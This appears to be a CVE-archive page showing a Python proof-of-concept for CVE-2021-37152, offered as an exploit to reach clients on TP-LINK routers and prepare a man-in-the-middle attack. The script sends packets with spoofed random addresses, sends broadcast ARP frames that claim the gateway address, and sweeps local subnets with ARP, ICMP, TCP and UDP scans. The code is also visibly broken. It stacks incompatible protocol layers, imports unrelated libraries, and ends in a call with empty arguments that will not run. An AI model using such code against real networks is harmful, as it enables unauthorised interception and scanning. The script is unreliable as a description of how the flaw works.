4837 Total CVEs
26 Years
GitHub
Home / 2021 / CVE-2021-37152
README.md
Rendering markdown...
POC / CVE-2021-37152.py PY
⬇ Raw GitHub ✕ Close 
# Exploit Title: Accsess network clients by sending packets in wirless TP-LINK and preparing for a mitm attack
# Date: 05.05.2021
# Exploit Author: Michael Alamoot (lhashashinl)
# Vendor Homepage: https://github.com/lhashashinl/CVE-2021-37152/
# Software Link: https://github.com/lhashashinl/CVE-2021-37152/CVE-2021-37152.py
# Version: 1.1.1
# Tested on: 5.10.0-kali7-amd64 
# CVE: CVE-2021-37152
# Documentation: https://github.com/lhashashinl/CVE-2021-37152/README.md

# =========================================

#!/usr/bin/env python3
# DEVELOPER Hashashin
# import library py
# banner
# This exploit is designed for accessing and scanning network clients
# and you will easily access and prepare for a mitm attack,
# the exploit will attack in layers three and two, you will learn more
# in the following, this exploit will be performed on most devices The range
# in the tested models is as follows and attack options 
# TP-LINK 54Mbps Wirless ADSL2+ Modem Router TD-W8901G power 9V == 0.85A ,
# TD-W9960-v1.20 , TP-LINK TL-WR840N300Mbps New Design Wireless N Router
# Exploit works on most devices tested on these models

# ========================================================
# import

from itertools import count
import socket
from scapy.all import *
from scapy import *
import sys , os , qrcode , weakref , quopri , networkx
import socketserver ,sockshandler , socket , _socket
from scapy import asn1fields , _version_from_git_describe
from colorama import Fore , init , Back , colorama_text
from sys import argv , set_asyncgen_hooks , hash_info 
import aiohttp , aioconsole , requests
import random , re , readline , subprocess
import fabric , ftplib , icalendar , hashid

# lhashashinl <--~M--->

# ==================================================
# hex

rawpyload = """
\x00\x00V\x04W\x00\x00c\x06^3\xcc\xc1f\xa8\xc0\xa8\x01\x06$
\x04\x00\x16\x00\x0009\x00\x00\x00dP\x02\x03\xe8a\xfd\x00\
x00\x08\x00\xa0\xea\x00\x00\x00\x00\x00\x01\x08\x00\x06\x04\
x00\x01\xfc\xf8\xae\x0f\xb1\xd0\xc0\xa8\x01\x01\xff\xff\xff\
xff\xff\xff\xc0\xa8\x01\x06\x005\x005\x00\n\x00\x00hi"""


hexdumpPyload = """
0000  45 00 00 5B 04 57 00 00 63 06 FD A9 FA 4D 99 A0  E..[.W..c....M..
0010  C0 A8 01 06 31 94 00 16 00 00 30 39 00 00 00 64  ....1.....09...d
0020  50 02 03 E8 F3 E3 00 00 08 00 8B 17 00 00 00 00  P...............
0030  00 01 08 00 06 04 00 01 FC F8 AE 0F B1 D0 C0 A8  ................
0040  01 01 FF FF FF FF FF FF C0 A8 01 06 00 35 00 35  .............5.5
0050  00 0F 00 00 4D 69 63 68 61 65 6C                 ....Michael
"""


# ==================================================
# Attack



class exploit: # class
    """<--DOC-->"""
    def __init__(self , target ,com=None , hand=False , end=True ,*args, **kwargs): # function
        self.target = target
        self.ipr = RandIP() # Random IP
        self.ip6R = RandIP6() # Random IP6
        self.macr = RandMAC() # Random MAC
        self.byteR = RandByte() # Random Byte
        self.shortr = RandShort() # Random short
        self.binR = RandBin() # Random binR
    
        
    def pyload(self , message , DefaultGetway , interface , count, countLeyer2 , *args, **kwargs): # fanctio
        pyload = IP(src=self.ipr,dst=self.target,id=1111,ttl=99,ihl=None,len=None)/TCP(sport=self.shortr,dport=[22,80],seq=12345,ack=100,window=1000,flags="S",dataofs= None)/ICMP(type = "echo-request" , code=0)/ARP(psrc=DefaultGetway,hwdst="ff:ff:ff:ff:ff:ff",pdst=self.target , hwlen= None, plen= None)/UDP(len= None,chksum= None)/f"{message}"
        pyloadLeyer2 = Ether(src=self.macr , dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="255.255.255.255",hwdst="ff:ff:ff:ff:ff:ff",hwlen= None, plen= None) # pyload leyer 2
        ipm = subprocess.getoutput("hostname -I")
        try:
            send(pyload , count=count , verbose=None , realtime=None , socket=None , iface=interface) # send packet
            for i in range(int(count)):
                print(f"\033[100;37;1m PYLOAD \033[0m send packet {ipm}to: {self.target} inteface={interface} count={count} ttl=99 ")
        except:
            for i in range(int(count)):
                print(f"\033[40;31;1m FAILED \033[0m send packet {ipm}to: {self.target} inteface={interface} count={count} ttl=99 ")
        try:
            sendp(pyloadLeyer2 , inter=.001 , iface=interface , count=countLeyer2 , socket=None) # send packet leyer 2
            for n in range(int(countLeyer2)):
                print(f"\033[41;37;1m PYLOAD \033[0m send packet {ipm}to: {self.target} inteface={interface} count={countLeyer2} ttl=99 ")
        except:
            for n in range(int(countLeyer2)):
                print(f"\033[40;31;1m FAILED \033[0m send packet {ipm}to: {self.target} inteface={interface} count={countLeyer2} ttl=99 ")
                
        return pyload # return pyload <---M--->
    
    
    def scanARP(self):
        ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2) # packet arp
        ans.summary(lambda s,r: r.sprintf("%Ether.src% %ARP.psrc%") ) # scaning by arp
        return ans # return ans
    
    
    def scanICMP(self):
        ans, unans = sr(IP(dst="192.168.1.1-254")/ICMP()) # packet icmp
        ans.summary(lambda s,r: r.sprintf("%IP.src% is alive") ) # scaning by icmp 
        return ans # return ans
    
        
    def scanTCP(self):
        ans, unans = sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") ) # packet tcp 
        ans.summary( lambda s,r : r.sprintf("%IP.src% is alive") ) # scaning by tcp
        return ans # return ans
    
        
    def scanUDP(self):
        ans, unans = sr( IP(dst="192.168.*.1-10")/UDP(dport=0) ) # packet udp
        ans.summary( lambda s,r : r.sprintf("%IP.src% is alive") ) # scanning by udp
        return ans # return ans
        

e = exploit(target="")
e.pyload(message="" , DefaultGetway="" , interface="" , count= , countLeyer2=)